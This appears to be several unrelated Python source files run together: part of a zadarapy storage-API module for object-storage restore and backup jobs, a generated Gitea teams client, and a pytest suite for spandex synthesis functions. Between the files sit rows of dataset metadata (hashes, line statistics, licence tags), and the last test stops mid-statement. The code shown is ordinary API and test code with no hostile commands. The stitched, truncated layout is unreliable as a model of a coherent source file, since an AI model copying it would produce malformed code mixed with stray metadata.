        resulting volume will not be encrypted.  Required.

    :type dedupe: str
    :param dedupe: If set to 'YES', deduplication will be enabled on the
        volume.  If 'NO', it won't.  Optional.

    :type compress: str
    :param compress: If set to 'YES', compression will be enabled on the
        volume.  If 'NO', it won't.  Optional.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string.  Otherwise, it will return a Python
        dictionary.  Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.

    :raises ValueError: If neither local_snapshot_id nor object_store_key
        was supplied.
    """
    verify_ros_destination_id(ros_destination_id)
    verify_pool_id(pool_id)
    verify_restore_mode(restore_mode)

    # NOTE(review): the verify_field label for volume_name is "volume"
    # rather than "volume_name"; left as-is to preserve error messages.
    body_values = {'name': verify_field(display_name, "display_name"),
                   'remote_object_store': ros_destination_id,
                   'poolname': pool_id, 'mode': restore_mode,
                   'volname': verify_field(volume_name, "volume"),
                   'crypt': verify_boolean(crypt, "crypt")}

    if local_snapshot_id is None and object_store_key is None:
        raise ValueError('Either "local_snapshot_id" or "object_store_key" '
                         'needs to be passed as a parameter.')

    if local_snapshot_id is not None:
        verify_snapshot_id(local_snapshot_id)
        body_values['local_snapname'] = local_snapshot_id

    if object_store_key is not None:
        body_values['key'] = verify_field(object_store_key, "object_store_key")

    if dedupe is not None:
        body_values["dedupe"] = verify_boolean(dedupe, 'dedupe')

    if compress is not None:
        body_values["compress"] = verify_boolean(compress, 'compress')

    path = '/api/object_storage_restore_jobs.json'

    return session.post_api(path=path, body=body_values,
                            return_type=return_type, **kwargs)
def pause_ros_restore_job(session, ros_restore_job_id, return_type=None,
                          **kwargs):
    """
    Pause a remote object storage restore job.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object. Required.

    :type ros_restore_job_id: str
    :param ros_restore_job_id: The remote object storage restore job 'name'
        value as returned by get_all_ros_restore_jobs. For example:
        'rstjobs-00000001'. Required.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string. Otherwise, it will return a Python
        dictionary. Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    verify_ros_restore_job_id(ros_restore_job_id)
    endpoint = '/api/object_storage_restore_jobs/{0}/pause.json'.format(
        ros_restore_job_id)
    return session.post_api(path=endpoint, return_type=return_type, **kwargs)
def resume_ros_restore_job(session, ros_restore_job_id, return_type=None,
                           **kwargs):
    """
    Resume a paused remote object storage restore job.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object. Required.

    :type ros_restore_job_id: str
    :param ros_restore_job_id: The remote object storage restore job 'name'
        value as returned by get_all_ros_restore_jobs. For example:
        'rstjobs-00000001'. Required.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string. Otherwise, it will return a Python
        dictionary. Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    verify_ros_restore_job_id(ros_restore_job_id)
    # The VPSA API spells "resume" as "continue" for this endpoint.
    endpoint = '/api/object_storage_restore_jobs/{0}/continue.json'.format(
        ros_restore_job_id)
    return session.post_api(path=endpoint, return_type=return_type, **kwargs)
def break_ros_restore_job(session, ros_restore_job_id, return_type=None,
                          **kwargs):
    """
    Break a remote object storage restore job. This action is irreversible.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object. Required.

    :type ros_restore_job_id: str
    :param ros_restore_job_id: The remote object storage restore job 'name'
        value as returned by get_all_ros_restore_jobs. For example:
        'rstjobs-00000001'. Required.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string. Otherwise, it will return a Python
        dictionary. Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    verify_ros_restore_job_id(ros_restore_job_id)
    endpoint = '/api/object_storage_restore_jobs/{0}/break.json'.format(
        ros_restore_job_id)
    return session.post_api(path=endpoint, return_type=return_type, **kwargs)
def change_ros_restore_job_mode(session, ros_restore_job_id, restore_mode,
                                return_type=None, **kwargs):
    """
    If the given remote object storage restore job is currently in "clone"
    mode, it can be changed to "restore" mode, or vice-versa.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object. Required.

    :type ros_restore_job_id: str
    :param ros_restore_job_id: The remote object storage restore job 'name'
        value as returned by get_all_ros_restore_jobs. For example:
        'rstjobs-00000001'. Required.

    :type restore_mode: str
    :param restore_mode: See documentation for create_ros_restore_job. Only
        "clone" and "restore" are valid values. Required.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string. Otherwise, it will return a Python
        dictionary. Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    verify_ros_restore_job_id(ros_restore_job_id)
    # The original code validated restore_mode twice, via both
    # verify_restore_job_mode() and verify_restore_mode(). Only the former
    # is kept: it matches the documented contract that only "clone" and
    # "restore" are acceptable for a mode switch (create_ros_restore_job's
    # broader verify_restore_mode also permits other creation-only modes).
    verify_restore_job_mode(restore_mode)
    body_values = {'mode': restore_mode}
    path = '/api/object_storage_restore_jobs/{0}/switch_mode.json' \
        .format(ros_restore_job_id)
    return session.post_api(path=path, body=body_values,
                            return_type=return_type, **kwargs)
def get_ros_backup_job_performance(session, ros_backup_job_id, interval=1,
                                   return_type=None, **kwargs):
    """
    Retrieve metering statistics for the remote object storage backup job
    over the specified interval. The default interval is one second.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object. Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The remote object storage backup job 'name'
        value as returned by get_all_ros_backup_jobs. For example:
        'bkpjobs-00000001'. Required.

    :type interval: int
    :param interval: The interval to collect statistics for, in seconds.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string. Otherwise, it will return a Python
        dictionary. Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    verify_ros_backup_job_id(ros_backup_job_id)
    interval = verify_interval(interval)
    query = {'interval': interval}
    endpoint = '/api/object_storage_backup_jobs/{0}/performance.json'.format(
        ros_backup_job_id)
    return session.get_api(path=endpoint, parameters=query,
                           return_type=return_type, **kwargs)
def get_ros_restore_job_performance(session, ros_restore_job_id, interval=1,
                                    return_type=None, **kwargs):
    """
    Retrieve metering statistics for the remote object storage restore job
    over the specified interval. The default interval is one second.

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object. Required.

    :type ros_restore_job_id: str
    :param ros_restore_job_id: The remote object storage restore job 'name'
        value as returned by get_all_ros_restore_jobs. For example:
        'rstjobs-00000001'. Required.

    :type interval: int
    :param interval: The interval to collect statistics for, in seconds.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string. Otherwise, it will return a Python
        dictionary. Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    verify_ros_restore_job_id(ros_restore_job_id)
    interval = verify_interval(interval)
    query = {'interval': interval}
    endpoint = '/api/object_storage_restore_jobs/{0}/performance.json'.format(
        ros_restore_job_id)
    return session.get_api(path=endpoint, parameters=query,
                           return_type=return_type, **kwargs)
def backup_jobs_rate_limit(session, ros_backup_job_id, limit,
                           return_type=None, **kwargs):
    """
    Sets the transfer rate limit of a remote object storage backup job.

    (The original docstring was copy-pasted from the performance-metering
    function and described the wrong behavior.)

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object. Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The remote object storage backup job 'name'
        value as returned by get_all_ros_backup_jobs. For example:
        'bkpjobs-00000001'. Required.

    :type limit: int
    :param limit: The rate limit to apply to the backup job. Required.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string. Otherwise, it will return a Python
        dictionary. Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    # Validate the job id up front, consistent with every other backup-job
    # endpoint in this module (the original skipped this check).
    verify_ros_backup_job_id(ros_backup_job_id)
    path = "/api/object_storage_backup_jobs/{0}/rate_limit.json".format(
        ros_backup_job_id)
    body_values = {"limit": limit}
    return session.post_api(path=path, body=body_values,
                            return_type=return_type, **kwargs)
def backup_jobs_update_compression(session, ros_backup_job_id, compression,
                                   return_type=None, **kwargs):
    """
    Updates the in-flight compression setting of a remote object storage
    backup job.

    (The original docstring was copy-pasted from the performance-metering
    function and described the wrong behavior.)

    :type session: zadarapy.session.Session
    :param session: A valid zadarapy.session.Session object. Required.

    :type ros_backup_job_id: str
    :param ros_backup_job_id: The remote object storage backup job 'name'
        value as returned by get_all_ros_backup_jobs. For example:
        'bkpjobs-00000001'. Required.

    :type compression: str
    :param compression: If set to 'YES', backup data will be compressed in
        flight. If 'NO', backup data will not be compressed. Required.

    :type return_type: str
    :param return_type: If this is set to the string 'json', this function
        will return a JSON string. Otherwise, it will return a Python
        dictionary. Optional (will return a Python dictionary by default).

    :rtype: dict, str
    :returns: A dictionary or JSON data set as a string depending on
        return_type parameter.
    """
    # Validate inputs like the sibling endpoints do: job id format, and the
    # YES/NO flag through verify_boolean (the original skipped both checks).
    verify_ros_backup_job_id(ros_backup_job_id)
    body_values = {"compression": verify_boolean(compression, "compression")}
    # POST /api/object_storage_backup_jobs/{id}/compression.json
    path = "/api/object_storage_backup_jobs/{0}/compression.json".format(
        ros_backup_job_id)
    return session.post_api(path=path, body=body_values,
                            return_type=return_type, **kwargs)
| 39.886002
| 79
| 0.683675
| 6,318
| 47,584
| 4.96692
| 0.059987
| 0.049712
| 0.027341
| 0.02817
| 0.826232
| 0.788758
| 0.769765
| 0.743826
| 0.714031
| 0.693923
| 0
| 0.008742
| 0.245124
| 47,584
| 1,192
| 80
| 39.919463
| 0.864894
| 0.612685
| 0
| 0.551095
| 0
| 0
| 0.136865
| 0.078163
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094891
| false
| 0.062044
| 0.00365
| 0
| 0.193431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
67da3e2f0060615cd7645759b7475494b930e4a6
| 5,801
|
py
|
Python
|
sandbox/lib/jumpscale/JumpscaleLibs/clients/gitea/client/teams_service.py
|
threefoldtech/threebot_prebuilt
|
1f0e1c65c14cef079cd80f73927d7c8318755c48
|
[
"Apache-2.0"
] | 2
|
2019-05-09T07:21:25.000Z
|
2019-08-05T06:37:53.000Z
|
sandbox/lib/jumpscale/JumpscaleLibs/clients/gitea/client/teams_service.py
|
threefoldtech/threebot_prebuilt
|
1f0e1c65c14cef079cd80f73927d7c8318755c48
|
[
"Apache-2.0"
] | 664
|
2018-12-19T12:43:44.000Z
|
2019-08-23T04:24:42.000Z
|
Jumpscale/clients/gitea/client/teams_service.py
|
threefoldtech/jumpscale10
|
5fb073a82aeb0e66fc7d9660c45a1e31bc094bfa
|
[
"Apache-2.0"
] | 7
|
2019-05-03T07:14:37.000Z
|
2019-08-05T12:36:52.000Z
|
# DO NOT EDIT THIS FILE. This file will be overwritten when re-running go-raml.
from .Repository import Repository
from .Team import Team
from .User import User
from .unhandled_api_error import UnhandledAPIError
from .unmarshall_error import UnmarshallError
class TeamsService:
    """Client wrapper for the Gitea ``/teams/{id}`` API endpoints.

    NOTE(review): this class was generated by go-raml, and the generator
    emitted four different methods that all collided on the name
    ``orgAddTeamMember`` — only the last definition (PUT
    /teams/{id}/repos/{org}/{repo}) was actually reachable at runtime.
    The three shadowed methods have been given distinct names below;
    ``orgAddTeamMember`` keeps its original surviving binding and
    signature for backward compatibility.
    """

    def __init__(self, client):
        # (The generated __init__ contained a stray `pass`, now removed.)
        self.client = client

    def orgRemoveTeamMember(self, username, id, headers=None, query_params=None, content_type="application/json"):
        """
        Remove a team member
        It is method for DELETE /teams/{id}/members/{username}
        """
        uri = self.client.base_url + "/teams/" + id + "/members/" + username
        return self.client.delete(uri, None, headers, query_params, content_type)

    def orgAddTeamMemberByUsername(self, data, username, id, headers=None, query_params=None, content_type="application/json"):
        """
        Add a team member
        It is method for PUT /teams/{id}/members/{username}

        (Named ...ByUsername because the generator's intended name,
        orgAddTeamMember, is occupied by the repo-adding method below.)
        """
        uri = self.client.base_url + "/teams/" + id + "/members/" + username
        return self.client.put(uri, data, headers, query_params, content_type)

    def orgListTeamMembers(self, id, headers=None, query_params=None, content_type="application/json"):
        """
        List a team's members
        It is method for GET /teams/{id}/members
        """
        uri = self.client.base_url + "/teams/" + id + "/members"
        resp = self.client.get(uri, None, headers, query_params, content_type)
        try:
            if resp.status_code == 200:
                resps = []
                for elem in resp.json():
                    resps.append(User(elem))
                return resps, resp
            message = "unknown status code={}".format(resp.status_code)
            raise UnhandledAPIError(response=resp, code=resp.status_code, message=message)
        except ValueError as msg:
            raise UnmarshallError(resp, msg)
        except UnhandledAPIError as uae:
            raise uae
        except Exception as e:
            # Python 3 exceptions have no `.message` attribute; the original
            # `e.message` raised AttributeError instead of UnmarshallError.
            raise UnmarshallError(resp, str(e))

    def orgRemoveTeamRepo(self, org, repo, id, headers=None, query_params=None, content_type="application/json"):
        """
        This does not delete the repository, it only removes the repository from the team.
        It is method for DELETE /teams/{id}/repos/{org}/{repo}
        """
        uri = self.client.base_url + "/teams/" + id + "/repos/" + org + "/" + repo
        return self.client.delete(uri, None, headers, query_params, content_type)

    def orgAddTeamMember(self, data, org, repo, id, headers=None, query_params=None, content_type="application/json"):
        """
        Add a repository to a team
        It is method for PUT /teams/{id}/repos/{org}/{repo}

        NOTE(review): the name is a generator artifact — this method adds a
        repository, not a member. It is kept as-is because this was the only
        reachable ``orgAddTeamMember`` binding in the original class.
        """
        uri = self.client.base_url + "/teams/" + id + "/repos/" + org + "/" + repo
        return self.client.put(uri, data, headers, query_params, content_type)

    def orgListTeamRepos(self, id, headers=None, query_params=None, content_type="application/json"):
        """
        List a team's repos
        It is method for GET /teams/{id}/repos
        """
        uri = self.client.base_url + "/teams/" + id + "/repos"
        resp = self.client.get(uri, None, headers, query_params, content_type)
        try:
            if resp.status_code == 200:
                resps = []
                for elem in resp.json():
                    resps.append(Repository(elem))
                return resps, resp
            message = "unknown status code={}".format(resp.status_code)
            raise UnhandledAPIError(response=resp, code=resp.status_code, message=message)
        except ValueError as msg:
            raise UnmarshallError(resp, msg)
        except UnhandledAPIError as uae:
            raise uae
        except Exception as e:
            # See orgListTeamMembers: `.message` does not exist in Python 3.
            raise UnmarshallError(resp, str(e))

    def orgDeleteTeam(self, id, headers=None, query_params=None, content_type="application/json"):
        """
        Delete a team
        It is method for DELETE /teams/{id}
        """
        uri = self.client.base_url + "/teams/" + id
        return self.client.delete(uri, None, headers, query_params, content_type)

    def orgGetTeam(self, id, headers=None, query_params=None, content_type="application/json"):
        """
        Get a team
        It is method for GET /teams/{id}
        """
        uri = self.client.base_url + "/teams/" + id
        resp = self.client.get(uri, None, headers, query_params, content_type)
        try:
            if resp.status_code == 200:
                return Team(resp.json()), resp
            message = "unknown status code={}".format(resp.status_code)
            raise UnhandledAPIError(response=resp, code=resp.status_code, message=message)
        except ValueError as msg:
            raise UnmarshallError(resp, msg)
        except UnhandledAPIError as uae:
            raise uae
        except Exception as e:
            # See orgListTeamMembers: `.message` does not exist in Python 3.
            raise UnmarshallError(resp, str(e))

    def orgEditTeam(self, data, id, headers=None, query_params=None, content_type="application/json"):
        """
        Edit a team
        It is method for PATCH /teams/{id}
        """
        uri = self.client.base_url + "/teams/" + id
        resp = self.client.patch(uri, data, headers, query_params, content_type)
        try:
            if resp.status_code == 200:
                return Team(resp.json()), resp
            message = "unknown status code={}".format(resp.status_code)
            raise UnhandledAPIError(response=resp, code=resp.status_code, message=message)
        except ValueError as msg:
            raise UnmarshallError(resp, msg)
        except UnhandledAPIError as uae:
            raise uae
        except Exception as e:
            # See orgListTeamMembers: `.message` does not exist in Python 3.
            raise UnmarshallError(resp, str(e))
| 41.733813
| 118
| 0.611619
| 694
| 5,801
| 5.020173
| 0.14121
| 0.057405
| 0.04822
| 0.046498
| 0.849024
| 0.849024
| 0.8407
| 0.80023
| 0.768083
| 0.758324
| 0
| 0.002872
| 0.279779
| 5,801
| 138
| 119
| 42.036232
| 0.83102
| 0.121358
| 0
| 0.732558
| 1
| 0
| 0.071206
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116279
| false
| 0.011628
| 0.05814
| 0
| 0.290698
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
67df25abf8299bcac0581594bc887fbdde4c3e8a
| 22,238
|
py
|
Python
|
spandex/targets/tests/test_synthesis.py
|
UDST/spandex
|
2f485b190d521bc84e9a66d71c8161b5214570d8
|
[
"BSD-3-Clause"
] | 21
|
2015-09-24T08:20:13.000Z
|
2020-08-10T16:15:03.000Z
|
spandex/targets/tests/test_synthesis.py
|
UDST/spandex
|
2f485b190d521bc84e9a66d71c8161b5214570d8
|
[
"BSD-3-Clause"
] | 3
|
2018-05-22T21:04:48.000Z
|
2018-05-30T20:40:44.000Z
|
spandex/targets/tests/test_synthesis.py
|
UDST/spandex
|
2f485b190d521bc84e9a66d71c8161b5214570d8
|
[
"BSD-3-Clause"
] | 14
|
2015-09-21T17:59:02.000Z
|
2020-05-06T05:12:40.000Z
|
import numpy as np
import pandas as pd
import pandas.util.testing as pdt
import pytest
from spandex.targets import synthesis as syn
@pytest.fixture
def seed(request):
    """Seed numpy's global RNG with 0; restore the prior state on teardown."""
    saved = np.random.get_state()

    def restore():
        np.random.set_state(saved)

    request.addfinalizer(restore)
    np.random.seed(0)
@pytest.fixture(scope='module')
def alloc_id():
    """Name of the allocation-id column used throughout these tests."""
    return 'thing_id'


@pytest.fixture(scope='module')
def count():
    """Name of the count column used throughout these tests."""
    return 'number'


@pytest.fixture(scope='module')
def df(alloc_id, count):
    """Five-row frame spread over allocation ids 'a', 'b' and 'c'."""
    data = {
        alloc_id: ['a', 'b', 'c', 'b', 'c'],
        count: [1, 2, 3, 4, 5],
    }
    return pd.DataFrame(data)


@pytest.fixture(scope='module')
def constraint():
    """Remaining capacity per allocation id."""
    return pd.Series([0, 1, 3], index=['a', 'b', 'c'])


@pytest.fixture(scope='module')
def constraint_units():
    """Column name for the constraint expressed directly in units."""
    return 'units'


@pytest.fixture(scope='module')
def constraint_scaled():
    """Column name for the constraint multiplied by a scale factor."""
    return 'scaled'


@pytest.fixture(scope='module')
def constraint_scale_factor():
    """Factor applied to the 'scaled' constraint column."""
    return 400


@pytest.fixture(scope='module')
def constraint_df(
        df, alloc_id, constraint, constraint_units, constraint_scaled,
        constraint_scale_factor):
    """Constraint table holding both a raw-unit and a scaled column.

    Total capacity is the remaining constraint plus what is already
    allocated in ``df``.
    """
    occupied = df[alloc_id].value_counts()
    total = constraint + occupied
    return pd.DataFrame({
        constraint_units: total,
        constraint_scaled: total * constraint_scale_factor,
    })


@pytest.fixture(scope='module')
def constraint_expr(constraint_scaled, constraint_scale_factor):
    """Expression that converts the scaled column back into units."""
    return '{} / {}'.format(constraint_scaled, constraint_scale_factor)
def test_allocate_rows(df, alloc_id, constraint, count):
    # _allocate_rows mutates `rows` in place (the assertion inspects `rows`
    # itself), reassigning each row's allocation id subject to `constraint`.
    rows = df.loc[[0, 1]]
    syn._allocate_rows(rows, alloc_id, constraint)
    pdt.assert_frame_equal(
        rows,
        pd.DataFrame(
            {alloc_id: ['b', 'c'],
             count: [1, 2]}))


def test_allocate_rows_stuff(df, alloc_id, constraint, count):
    # stuff=True: every row receives an allocation id even past capacity.
    rows = df.copy(deep=True)
    stuff = True
    syn._allocate_rows(rows, alloc_id, constraint, stuff=stuff)
    pdt.assert_frame_equal(
        rows,
        pd.DataFrame(
            {alloc_id: ['b', 'c', 'c', 'c', 'a'],
             count: df[count]}))


def test_allocate_rows_no_stuff(df, alloc_id, constraint, count):
    # stuff=False: the overflow row is left unallocated (id is None).
    rows = df.copy(deep=True)
    stuff = False
    syn._allocate_rows(rows, alloc_id, constraint, stuff=stuff)
    pdt.assert_frame_equal(
        rows,
        pd.DataFrame(
            {alloc_id: ['b', 'c', 'c', 'c', None],
             count: df[count]}))


def test_remove_rows(seed, df, alloc_id, count):
    # `seed` pins numpy's global RNG, making the randomly chosen rows to
    # drop (and hence the expected frame below) reproducible.
    num = 2
    result = syn._remove_rows(df, num)
    assert len(result) == len(df) - num
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['b', 'c', 'b'],
             count: [2, 3, 4]},
            index=[1, 2, 3]))


def test_remove_rows_noop(seed, df):
    # Removing zero rows must return the frame unchanged.
    num = 0
    result = syn._remove_rows(df, num)
    assert len(result) == len(df) - num
    pdt.assert_frame_equal(result, df)
def test_add_rows_noop(seed, df, alloc_id, constraint):
    """Adding zero rows must return the frame unchanged.

    The original version of this test called ``syn._remove_rows`` instead of
    ``syn._add_rows`` (copy/paste error), so the add path was never
    exercised; the assertions only passed because num == 0 makes the two
    calls coincide.
    """
    num = 0
    result = syn._add_rows(df, num, alloc_id, constraint)
    assert len(result) == len(df) + num
    pdt.assert_frame_equal(result, df)
def test_add_rows(seed, df, alloc_id, count, constraint):
    # `seed` pins numpy's global RNG; the ids/counts of the appended rows
    # below are the reproducible random draws.
    num = 3
    result = syn._add_rows(df, num, alloc_id, constraint)
    assert len(result) == len(df) + num
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c'],
             count: [1, 2, 3, 4, 5, 5, 1, 4]}))


def test_add_rows_stuff(seed, df, alloc_id, count, constraint):
    # stuff=True: rows beyond the remaining capacity still receive an id.
    num = 5
    stuff = True
    result = syn._add_rows(df, num, alloc_id, constraint, stuff=stuff)
    assert len(result) == len(df) + num
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
             count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))


def test_add_rows_no_stuff(seed, df, alloc_id, count, constraint):
    # stuff=False: the overflow row is left with a None allocation id.
    num = 5
    stuff = False
    result = syn._add_rows(df, num, alloc_id, constraint, stuff=stuff)
    assert len(result) == len(df) + num
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
             count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))


def test_remove_rows_by_count_noop(df, count):
    # amount=0: the count-column total and the frame are unchanged.
    amount = 0
    result = syn._remove_rows_by_count(df, amount, count)
    assert result[count].sum() == df[count].sum()
    pdt.assert_frame_equal(result, df)


def test_remove_rows_by_count(df, count, alloc_id):
    # Rows are removed until `amount` worth of the count column is gone.
    amount = 10
    result = syn._remove_rows_by_count(df, amount, count)
    assert result[count].sum() == df[count].sum() - amount
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['b', 'c'],
             count: [2, 3]},
            index=[1, 2]))


def test_add_rows_by_count_noop(df, count, alloc_id, constraint):
    # amount=0: nothing is added.
    amount = 0
    result = syn._add_rows_by_count(df, amount, count, alloc_id, constraint)
    assert result[count].sum() == df[count].sum()
    pdt.assert_frame_equal(result, df)


def test_add_rows_by_count(df, count, alloc_id, constraint):
    # Rows are added until the count column grows by exactly `amount`.
    amount = 8
    result = syn._add_rows_by_count(df, amount, count, alloc_id, constraint)
    assert result[count].sum() == df[count].sum() + amount
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c'],
             count: [1, 2, 3, 4, 5, 5, 3]}))


def test_add_rows_by_count_stuff(df, count, alloc_id, constraint):
    # stuff=True: all added rows receive allocation ids.
    amount = 18
    stuff = True
    result = syn._add_rows_by_count(
        df, amount, count, alloc_id, constraint, stuff=stuff)
    assert result[count].sum() == df[count].sum() + amount
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a', 'b'],
             count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, 3]}))


def test_add_rows_by_count_no_stuff(df, count, alloc_id, constraint):
    # stuff=False: rows past the constraint keep a None id.
    amount = 18
    stuff = False
    result = syn._add_rows_by_count(
        df, amount, count, alloc_id, constraint, stuff=stuff)
    assert result[count].sum() == df[count].sum() + amount
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: [
                'a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None, None],
             count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, 3]}))
def test_add_or_remove_rows_noop(seed, df, alloc_id, count, constraint):
    # target equals the current length, so nothing is added or removed.
    target = len(df)
    result = syn._add_or_remove_rows(df, target, alloc_id, constraint)
    assert len(result) == target
    pdt.assert_frame_equal(result, df)


def test_add_or_remove_rows_add(seed, df, alloc_id, count, constraint):
    # target above the current length: rows are added (the seeded RNG makes
    # the expected frame reproducible).
    target = 8
    result = syn._add_or_remove_rows(df, target, alloc_id, constraint)
    assert len(result) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c'],
             count: [1, 2, 3, 4, 5, 5, 1, 4]}))


def test_add_or_remove_rows_add_stuff(seed, df, alloc_id, count, constraint):
    # stuff=True: every added row receives an allocation id.
    target = 10
    stuff = True
    result = syn._add_or_remove_rows(
        df, target, alloc_id, constraint, stuff=stuff)
    assert len(result) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
             count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))


def test_add_or_remove_rows_add_no_stuff(
        seed, df, alloc_id, count, constraint):
    # stuff=False: the overflow row gets a None id.
    target = 10
    stuff = False
    result = syn._add_or_remove_rows(
        df, target, alloc_id, constraint, stuff=stuff)
    assert len(result) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
             count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))


def test_add_or_remove_rows_remove(seed, df, alloc_id, count, constraint):
    # target below the current length: rows are removed.
    target = 3
    result = syn._add_or_remove_rows(df, target, alloc_id, constraint)
    assert len(result) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['b', 'c', 'b'],
             count: [2, 3, 4]},
            index=[1, 2, 3]))


def test_add_or_remove_rows_count_noop(seed, df, alloc_id, count, constraint):
    # With count= passed, target is interpreted as a count-column total.
    target = df[count].sum()
    result = syn._add_or_remove_rows(
        df, target, alloc_id, constraint, count=count)
    assert result[count].sum() == target
    pdt.assert_frame_equal(result, df)


def test_add_or_remove_rows_count_add(seed, df, alloc_id, count, constraint):
    # Rows are added until the count column sums to `target`.
    target = 18
    result = syn._add_or_remove_rows(
        df, target, alloc_id, constraint, count=count)
    assert result[count].sum() == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b'],
             count: [1, 2, 3, 4, 5, 3]}))


def test_add_or_remove_rows_count_add_stuff(
        seed, df, alloc_id, count, constraint):
    # count-based target with stuff=True.
    target = 30
    stuff = True
    result = syn._add_or_remove_rows(
        df, target, alloc_id, constraint, count=count, stuff=stuff)
    assert result[count].sum() == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
             count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1]}))


def test_add_or_remove_rows_count_add_no_stuff(
        seed, df, alloc_id, count, constraint):
    # count-based target with stuff=False: overflow row id is None.
    target = 30
    stuff = False
    result = syn._add_or_remove_rows(
        df, target, alloc_id, constraint, count=count, stuff=stuff)
    assert result[count].sum() == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
             count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1]}))


def test_add_or_remove_rows_count_remove(
        seed, df, alloc_id, count, constraint):
    # Rows are removed until the count column sums to `target`.
    target = 10
    result = syn._add_or_remove_rows(
        df, target, alloc_id, constraint, count=count)
    assert result[count].sum() == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b'],
             count: [1, 2, 3, 4]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_noop(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    # Each synthesize_one test runs twice: once naming the constraint column
    # directly and once deriving it through constraint_expr; both forms must
    # yield identical results.
    target = 5
    if not scaled_test:
        result = syn.synthesize_one(
